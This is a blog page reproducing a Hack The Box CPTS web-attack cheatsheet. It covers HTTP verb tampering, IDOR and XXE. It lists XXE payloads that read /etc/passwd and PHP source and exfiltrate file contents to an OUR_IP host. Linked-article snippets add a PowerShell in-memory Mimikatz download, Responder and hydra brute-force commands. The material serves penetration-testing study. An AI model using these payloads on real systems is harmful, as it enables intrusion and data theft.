HTB CPTS Cheatsheet - Web Attacking
HTTP Verb Tampering
HTTP Method
HEADPUTDELETEOPTIONSPATCH
| Command | Description |
|---|---|
-X OPTIONS |
Set HTTP Method with Curl |
IDOR
Identify IDORS
- In
URL parameters & APIs - In
AJAX Calls - By
understanding reference hashing/encoding - By
comparing user roles
| Command | Description |
|---|---|
md5sum |
MD5 hash a string |
base64 |
Base64 encode a string |
XXE
| Code | Description |
|---|---|
<!ENTITY xxe SYSTEM "http://localhost/email.dtd"> |
Define External Entity to a URL |
<!ENTITY xxe SYSTEM "file:///etc/passwd"> |
Define External Entity to a file path |
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php"> |
Read PHP source code with base64 encode filter |
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>"> |
Reading a file through a PHP error |
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>"> |
Reading a file OOB exfiltration |
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
Related Articles
2024-12-23
HTB CPTS Cheatsheet - Attacking Common Applications
Command Description sudo vim /etc/hosts Opens the /etc/hosts with vim to start adding hostnames sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list Runs an nmap scan using common web application ports based on a scope list (scope_list) and outputs to a file (web_discovery) in all formats (-oA) eyewitness --web -x web_discovery.xml -d <nameofdirectorytobecreated> Runs eyewitness using a file generated by an nmap scan (web_discovery.xml) and cre...
2024-12-23
HTB CPTS Cheatsheet - Active Directory Enumeration And Attacks
Initial Enumeration Command Description nslookup ns1.inlanefreight.com Used to query the domain name system and discover the IP address to domain name mapping of the target entered from a Linux-based host. sudo tcpdump -i ens224 Used to start capturing network packets on the network interface proceeding the -i option a Linux-based host. sudo responder -I ens224 -A Used to start responding to & analyzing LLMNR, NBT-NS and MDNS queries on the interface specified proceeding the -I o...
2024-12-23
HTB CPTS Cheatsheet - Attacking Common Services
Attacking FTP Command Description ftp 192.168.2.142 Connecting to the FTP server using the ftp client. nc -v 192.168.2.142 21 Connecting to the FTP server using netcat. hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142 Brute-forcing the FTP service. Attacking SMB Command Description smbclient -N -L //10.129.14.128 Null-session testing against the SMB service. smbmap -H 10.129.14.128 Network share enumeration using smbmap. smbmap -H 10.129.14.128 -r no...
2024-12-23
HTB CPTS Cheatsheet - Brute Forcing
Hydra Command Description hydra -h hydra help hydra -C wordlist.txt SERVER_IP -s PORT http-get / Basic Auth Brute Force - Combined Wordlist hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get / Basic Auth Brute Force - User/Pass Wordlists hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" Login Form Brute Force - Static User, Pass Wordlist hydra -L bi...
2024-12-23
HTB CPTS Cheatsheet - File Transfers
Command Description Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1 Download a file with PowerShell IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1') Execute a file in memory using PowerShell Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64 Upload a file with PowerShell bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe Download a file using Bitsadmin certutil.exe -verify...
2024-12-23
HTB CPTS Cheatsheet - Command Injection
Injection Operators Injection Operator Injection Character URL-Encoded Character Executed Command Semicolon ; %3b Both New Line \n %0a Both Background & %26 Both (second output generally shown first) Pipe | %7c Both (only second output is shown) AND && %26%26 Both (only if first succeeds) OR || %7c%7c Second (only if first fails) Sub-Shell `` %60%60 Both (Linux-only) Sub-Shell $() %24%28%29 Both (Linux-only) LinuxFiltered Character Bypass Code Description ...
